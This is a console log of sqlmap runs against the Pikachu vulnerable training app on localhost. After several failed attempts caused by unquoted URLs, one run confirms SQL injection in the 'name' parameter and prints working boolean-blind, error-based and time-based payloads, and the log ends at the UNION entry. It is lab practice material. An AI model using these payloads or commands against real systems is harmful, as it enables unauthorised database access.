Microsoft Windows [版本 10.0.19044.1706]
(c) Microsoft Corporation。保留所有权利。

D:\sqlmap>sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_str.php?name=Tony&submit=%E6%9F%A5%E8%AF%A2 --current -db
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.5.5#dev}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:55:27 /2022-05-20/

[11:55:33] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4se7mn8vqe9...cmeug292k1'). Do you want to use those [Y/n] y
[11:55:36] [INFO] testing if the target URL content is stable
[11:55:36] [INFO] target URL content is stable
[11:55:36] [INFO] testing if GET parameter 'name' is dynamic
[11:55:36] [WARNING] GET parameter 'name' does not appear to be dynamic
[11:55:36] [WARNING] heuristic (basic) test shows that GET parameter 'name' might not be injectable
[11:55:37] [INFO] testing for SQL injection on GET parameter 'name'
[11:55:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:55:38] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:55:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:55:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:55:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[11:55:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:55:38] [INFO] testing 'Generic inline queries'
[11:55:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[11:55:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[11:55:38] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[11:55:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:55:38] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:55:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[11:55:38] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[11:55:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:55:42] [WARNING] GET parameter 'name' does not seem to be injectable
[11:55:42] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 11:55:42 /2022-05-20/

'submit' 不是内部或外部命令,也不是可运行的程序
或批处理文件。

D:\sqlmap>sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_str.php?name=Tony --current -db
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.5.5#dev}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: sqlmap.py [options]

sqlmap.py: error: ambiguous option: --current (--current-db, --current-user?)

Press Enter to continue...

D:\sqlmap>sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_str.php?name=Tony&submit=%E6%9F%A5%E8%AF%A2 --current -db
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.5.5#dev}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:26:37 /2022-05-20/

[12:26:38] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=97oi7tjgv9a...o3tr68gj00'). Do you want to use those [Y/n]

[12:26:38] [INFO] testing if the target URL content is stable
[12:26:38] [INFO] target URL content is stable
[12:26:38] [INFO] testing if GET parameter 'name' is dynamic
[12:26:39] [WARNING] GET parameter 'name' does not appear to be dynamic
[12:26:39] [WARNING] heuristic (basic) test shows that GET parameter 'name' might not be injectable
[12:26:39] [INFO] testing for SQL injection on GET parameter 'name'
[12:26:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:26:40] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:26:40] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:26:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:26:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:26:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:26:40] [INFO] testing 'Generic inline queries'
[12:26:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:26:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:26:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:26:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:26:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:26:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:26:41] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]

[12:26:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:26:41] [WARNING] GET parameter 'name' does not seem to be injectable
[12:26:41] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 12:26:41 /2022-05-20/

'submit' 不是内部或外部命令,也不是可运行的程序
或批处理文件。

D:\sqlmap>
D:\sqlmap>y
'y' 不是内部或外部命令,也不是可运行的程序
或批处理文件。

D:\sqlmap>sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_str.php?name=125&submit=%E6%9F%A5%E8%AF%A2# --current -db
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.5.5#dev}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:36:22 /2022-05-20/

[13:36:22] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=g47tkngnmok...jtjp080090'). Do you want to use those [Y/n] y
[13:36:25] [INFO] testing if the target URL content is stable
[13:36:26] [INFO] target URL content is stable
[13:36:26] [INFO] testing if GET parameter 'name' is dynamic
[13:36:26] [WARNING] GET parameter 'name' does not appear to be dynamic
[13:36:26] [WARNING] heuristic (basic) test shows that GET parameter 'name' might not be injectable
[13:36:26] [INFO] testing for SQL injection on GET parameter 'name'
[13:36:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:36:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:36:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[13:36:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:36:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[13:36:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:36:28] [INFO] testing 'Generic inline queries'
[13:36:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[13:36:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[13:36:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[13:36:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:36:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:36:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[13:36:28] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[13:36:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:36:32] [WARNING] GET parameter 'name' does not seem to be injectable
[13:36:32] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 13:36:32 /2022-05-20/

'submit' 不是内部或外部命令,也不是可运行的程序
或批处理文件。

D:\sqlmap>sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_str.php?name=125&submit=%E6%9F%A5%E8%AF%A2# --current-db
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.5.5#dev}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:37:42 /2022-05-20/

[13:37:42] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=j5iaao63bhp...cek8moevc1'). Do you want to use those [Y/n] y
[13:37:47] [INFO] testing if the target URL content is stable
[13:37:47] [INFO] target URL content is stable
[13:37:47] [INFO] testing if GET parameter 'name' is dynamic
[13:37:47] [WARNING] GET parameter 'name' does not appear to be dynamic
[13:37:47] [WARNING] heuristic (basic) test shows that GET parameter 'name' might not be injectable
[13:37:48] [INFO] testing for SQL injection on GET parameter 'name'
[13:37:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:37:49] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:37:49] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[13:37:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:37:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[13:37:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:37:49] [INFO] testing 'Generic inline queries'
[13:37:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[13:37:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[13:37:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[13:37:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:37:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:37:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[13:37:49] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[13:37:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:37:53] [WARNING] GET parameter 'name' does not seem to be injectable
[13:37:53] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 13:37:53 /2022-05-20/

'submit' 不是内部或外部命令,也不是可运行的程序
或批处理文件。

D:\sqlmap>sqlmap.py -u "http://localhost/pikachu/vul/sqli/sqli_str.php?name=125&submit=%E6%9F%A5%E8%AF%A2#" --current-db
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.5.5#dev}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:38:26 /2022-05-20/

[13:38:26] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=df9hb2ie254...0k7oga2m00'). Do you want to use those [Y/n] y
[13:38:29] [INFO] testing if the target URL content is stable
[13:38:30] [INFO] target URL content is stable
[13:38:30] [INFO] testing if GET parameter 'name' is dynamic
[13:38:30] [WARNING] GET parameter 'name' does not appear to be dynamic
[13:38:30] [INFO] heuristic (basic) test shows that GET parameter 'name' might be injectable (possible DBMS: 'MySQL')
[13:38:30] [INFO] heuristic (XSS) test shows that GET parameter 'name' might be vulnerable to cross-site scripting (XSS) attacks
[13:38:30] [INFO] testing for SQL injection on GET parameter 'name'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[13:38:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:38:38] [WARNING] reflective value(s) found and filtering out
[13:38:38] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:38:38] [INFO] testing 'Generic inline queries'
[13:38:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[13:38:39] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[13:38:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[13:38:42] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[13:38:43] [INFO] GET parameter 'name' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --string="\u60a8\u8f93\u5165\u7684username\u4e0d\u5b58\u5728\uff0c\u8bf7\u91cd\u65b0\u8f93\u5165\uff01")
[13:38:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[13:38:43] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[13:38:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[13:38:43] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[13:38:43] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[13:38:43] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[13:38:43] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[13:38:43] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[13:38:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[13:38:43] [INFO] GET parameter 'name' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[13:38:43] [INFO] testing 'MySQL inline queries'
[13:38:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[13:38:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[13:38:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[13:38:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[13:38:43] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[13:38:43] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[13:38:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:38:53] [INFO] GET parameter 'name' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[13:38:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:38:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:38:53] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[13:38:53] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[13:38:54] [INFO] target URL appears to have 2 columns in query
[13:38:54] [INFO] GET parameter 'name' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[13:38:57] [INFO] testing if GET parameter 'submit' is dynamic
[13:38:57] [WARNING] GET parameter 'submit' does not appear to be dynamic
[13:38:57] [WARNING] heuristic (basic) test shows that GET parameter 'submit' might not be injectable
[13:38:57] [INFO] testing for SQL injection on GET parameter 'submit'
[13:38:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:38:58] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:38:58] [INFO] testing 'Generic inline queries'
[13:38:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[13:38:58] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[13:38:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[13:39:00] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[13:39:01] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[13:39:02] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[13:39:04] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[13:39:05] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[13:39:06] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[13:39:07] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[13:39:08] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[13:39:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[13:39:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[13:39:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[13:39:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[13:39:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[13:39:09] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[13:39:09] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[13:39:09] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[13:39:09] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[13:39:09] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[13:39:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[13:39:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[13:39:11] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[13:39:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[13:39:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[13:39:13] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[13:39:14] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[13:39:15] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[13:39:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[13:39:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[13:39:18] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[13:39:18] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[13:39:19] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[13:39:20] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[13:39:21] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[13:39:22] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[13:39:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[13:39:24] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[13:39:24] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[13:39:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[13:39:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[13:39:25] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[13:39:25] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[13:39:25] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[13:39:25] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[13:39:25] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[13:39:25] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[13:39:25] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[13:39:25] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[13:39:25] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[13:39:25] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[13:39:25] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[13:39:25] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[13:39:26] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[13:39:26] [INFO] testing 'MySQL inline queries'
[13:39:26] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[13:39:26] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[13:39:27] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[13:39:27] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[13:39:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[13:39:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[13:39:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:39:29] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[13:39:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[13:39:31] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[13:39:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[13:39:32] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[13:39:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[13:39:33] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[13:39:34] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[13:39:35] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[13:39:36] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[13:39:36] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[13:39:37] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[13:39:38] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[13:39:38] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[13:39:41] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[13:39:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[13:39:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[13:39:43] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[13:39:44] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[13:39:44] [INFO] testing 'MySQL AND time-based blind (ELT)'
[13:39:45] [INFO] testing 'MySQL OR time-based blind (ELT)'
[13:39:46] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[13:39:46] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[13:39:47] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[13:39:48] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[13:39:48] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[13:39:48] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[13:39:48] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[13:39:48] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[13:39:49] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[13:39:49] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[13:39:49] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[13:39:49] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[13:39:49] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[13:42:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:42:38] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[13:42:38] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[13:42:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:42:43] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[13:42:49] [WARNING] GET parameter 'submit' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3993 HTTP(s) requests:
---
Parameter: name (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: name=125' RLIKE (SELECT (CASE WHEN (9692=9692) THEN 125 ELSE 0x28 END))-- Wxxo&submit=??????

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: name=125' AND (SELECT 4398 FROM(SELECT COUNT(*),CONCAT(0x7171707a71,(SELECT (ELT(4398=4398,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UEfG&submit=??????

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=125' AND (SELECT 9681 FROM (SELECT(SLEEP(5)))aLvG)-- OQRc&submit=??????

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
